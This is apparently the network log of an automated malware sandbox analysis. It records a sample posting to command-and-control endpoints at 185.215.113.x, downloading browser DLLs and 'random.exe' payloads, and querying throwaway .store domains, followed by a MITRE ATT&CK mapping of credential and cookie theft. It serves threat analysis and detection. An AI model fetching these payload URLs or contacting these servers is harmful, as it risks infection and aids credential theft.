GET https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D31%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D31%2526e%253D1
216.58.213.1:443

https://clients2.googleusercontent.com/crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx

tls, http2

chrome.exe

4.5kB
153.5kB
73
115

HTTP Request

GET https://clients2.googleusercontent.com/crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx
127.0.0.1:9229

file.exe
185.215.113.206:80

http://185.215.113.206/6c4adf523b719729.php

http

file.exe

2.2kB
737 B
9
8

HTTP Request

POST http://185.215.113.206/6c4adf523b719729.php

HTTP Response

200

HTTP Request

POST http://185.215.113.206/6c4adf523b719729.php

HTTP Response

200
127.0.0.1:9229

file.exe
104.208.16.94:443

https://nw-umwatson.events.data.microsoft.com/Telemetry.Request

tls, http

msedge.exe

15.2kB
9.0kB
21
14

HTTP Request

POST https://nw-umwatson.events.data.microsoft.com/Telemetry.Request

HTTP Response

200

HTTP Request

POST https://nw-umwatson.events.data.microsoft.com/Telemetry.Request

HTTP Response

200

HTTP Request

POST https://nw-umwatson.events.data.microsoft.com/Telemetry.Request
127.0.0.1:9229

file.exe
185.215.113.206:80

http://185.215.113.206/6c4adf523b719729.php

http

file.exe

148.9kB
4.3MB
3077
3067

HTTP Request

POST http://185.215.113.206/6c4adf523b719729.php

HTTP Response

200

HTTP Request

POST http://185.215.113.206/6c4adf523b719729.php

HTTP Response

200

HTTP Request

GET http://185.215.113.206/746f34465cf17784/freebl3.dll

HTTP Response

200

HTTP Request

GET http://185.215.113.206/746f34465cf17784/mozglue.dll

HTTP Response

200

HTTP Request

GET http://185.215.113.206/746f34465cf17784/msvcp140.dll

HTTP Response

200

HTTP Request

GET http://185.215.113.206/746f34465cf17784/nss3.dll

HTTP Response

200

HTTP Request

GET http://185.215.113.206/746f34465cf17784/softokn3.dll

HTTP Response

200

HTTP Request

GET http://185.215.113.206/746f34465cf17784/vcruntime140.dll

HTTP Response

200

HTTP Request

POST http://185.215.113.206/6c4adf523b719729.php

HTTP Response

200

HTTP Request

POST http://185.215.113.206/6c4adf523b719729.php

HTTP Response

200

HTTP Request

POST http://185.215.113.206/6c4adf523b719729.php

HTTP Response

200

HTTP Request

POST http://185.215.113.206/6c4adf523b719729.php

HTTP Response

200

HTTP Request

POST http://185.215.113.206/6c4adf523b719729.php

HTTP Response

200

HTTP Request

POST http://185.215.113.206/6c4adf523b719729.php

HTTP Response

200
127.0.0.1:9229

file.exe
185.215.113.16:80

http://185.215.113.16/mine/random.exe

http

file.exe

117.8kB
3.3MB
2380
2376

HTTP Request

GET http://185.215.113.16/mine/random.exe

HTTP Response

200
185.215.113.43:80

http://185.215.113.43/Zu7JuNko/index.php

http

skotes.exe

2.1kB
2.0kB
20
12

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200
185.215.113.16:80

http://185.215.113.16/off/random.exe

http

skotes.exe

309.3kB
8.3MB
5951
5938

HTTP Request

GET http://185.215.113.16/luma/random.exe

HTTP Response

200

HTTP Request

GET http://185.215.113.16/steam/random.exe

HTTP Response

200

HTTP Request

GET http://185.215.113.16/off/random.exe

HTTP Response

200
104.21.5.155:443

https://founpiuer.store/api

tls, http

7134274202.exe

1.7kB
10.3kB
15
18

HTTP Request

POST https://founpiuer.store/api

HTTP Response

403

HTTP Request

POST https://founpiuer.store/api

HTTP Response

200
185.215.113.206:80

http://185.215.113.206/6c4adf523b719729.php

http

cddabe90fb.exe

819 B
625 B
7
5

HTTP Request

GET http://185.215.113.206/

HTTP Response

200

HTTP Request

POST http://185.215.113.206/6c4adf523b719729.php

HTTP Response

200
185.215.113.206:80

http://185.215.113.206/6c4adf523b719729.php

http

skotes.exe

819 B
625 B
7
5

HTTP Request

GET http://185.215.113.206/

HTTP Response

200

HTTP Request

POST http://185.215.113.206/6c4adf523b719729.php

HTTP Response

200

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

209.205.72.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

209.205.72.20.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

206.113.215.185.in-addr.arpa

dns

74 B
134 B
1
1

DNS Request

206.113.215.185.in-addr.arpa
8.8.8.8:53

71.159.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

71.159.190.20.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

www.google.com

dns

chrome.exe

60 B
76 B
1
1

DNS Request

www.google.com

DNS Response

142.250.180.4
8.8.8.8:53

42.169.217.172.in-addr.arpa

dns

73 B
112 B
1
1

DNS Request

42.169.217.172.in-addr.arpa
8.8.8.8:53

4.180.250.142.in-addr.arpa

dns

72 B
110 B
1
1

DNS Request

4.180.250.142.in-addr.arpa
8.8.8.8:53

ogads-pa.googleapis.com

dns

chrome.exe

69 B
293 B
1
1

DNS Request

ogads-pa.googleapis.com

DNS Response

142.250.200.42

142.250.180.10

142.250.200.10

172.217.16.234

142.250.187.202

172.217.169.74

142.250.187.234

172.217.169.10

142.250.178.10

142.250.179.234

216.58.213.10

216.58.204.74

216.58.201.106

172.217.169.42
8.8.8.8:53

apis.google.com

dns

chrome.exe

61 B
98 B
1
1

DNS Request

apis.google.com

DNS Response

216.58.201.110
142.250.200.42:443

ogads-pa.googleapis.com

https

chrome.exe

2.9kB
6.5kB
5
8
8.8.8.8:53

227.187.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

227.187.250.142.in-addr.arpa
8.8.8.8:53

42.200.250.142.in-addr.arpa

dns

73 B
112 B
1
1

DNS Request

42.200.250.142.in-addr.arpa
8.8.8.8:53

110.201.58.216.in-addr.arpa

dns

73 B
173 B
1
1

DNS Request

110.201.58.216.in-addr.arpa
8.8.8.8:53

play.google.com

dns

chrome.exe

61 B
77 B
1
1

DNS Request

play.google.com

DNS Response

172.217.16.238
8.8.8.8:53

238.16.217.172.in-addr.arpa

dns

73 B
142 B
1
1

DNS Request

238.16.217.172.in-addr.arpa
8.8.8.8:53

clients2.google.com

dns

chrome.exe

65 B
105 B
1
1

DNS Request

clients2.google.com

DNS Response

216.58.201.110
224.0.0.251:5353

527 B
8
8.8.8.8:53

clients2.googleusercontent.com

dns

chrome.exe

76 B
121 B
1
1

DNS Request

clients2.googleusercontent.com

DNS Response

216.58.213.1
8.8.8.8:53

1.213.58.216.in-addr.arpa

dns

71 B
138 B
1
1

DNS Request

1.213.58.216.in-addr.arpa
8.8.8.8:53

241.150.49.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

241.150.49.20.in-addr.arpa
8.8.8.8:53

nw-umwatson.events.data.microsoft.com

dns

msedge.exe

83 B
214 B
1
1

DNS Request

nw-umwatson.events.data.microsoft.com

DNS Response

104.208.16.94
8.8.8.8:53

94.16.208.104.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

94.16.208.104.in-addr.arpa
8.8.8.8:53

16.113.215.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

16.113.215.185.in-addr.arpa
8.8.8.8:53

197.87.175.4.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

197.87.175.4.in-addr.arpa
8.8.8.8:53

241.42.69.40.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

241.42.69.40.in-addr.arpa
8.8.8.8:53

75.117.19.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

75.117.19.2.in-addr.arpa
8.8.8.8:53

43.113.215.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

43.113.215.185.in-addr.arpa
8.8.8.8:53

presticitpo.store

dns

7134274202.exe

63 B
128 B
1
1

DNS Request

presticitpo.store
8.8.8.8:53

crisiwarny.store

dns

7134274202.exe

62 B
127 B
1
1

DNS Request

crisiwarny.store
8.8.8.8:53

fadehairucw.store

dns

7134274202.exe

63 B
128 B
1
1

DNS Request

fadehairucw.store
8.8.8.8:53

thumbystriw.store

dns

7134274202.exe

63 B
128 B
1
1

DNS Request

thumbystriw.store
8.8.8.8:53

necklacedmny.store

dns

7134274202.exe

64 B
129 B
1
1

DNS Request

necklacedmny.store
8.8.8.8:53

founpiuer.store

dns

7134274202.exe

61 B
93 B
1
1

DNS Request

founpiuer.store

DNS Response

104.21.5.155

172.67.133.135
8.8.8.8:53

155.5.21.104.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

155.5.21.104.in-addr.arpa
8.8.8.8:53

240.221.184.93.in-addr.arpa

dns

146 B
288 B
2
2

DNS Request

240.221.184.93.in-addr.arpa

DNS Request

240.221.184.93.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Authentication Process

Modify Registry

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion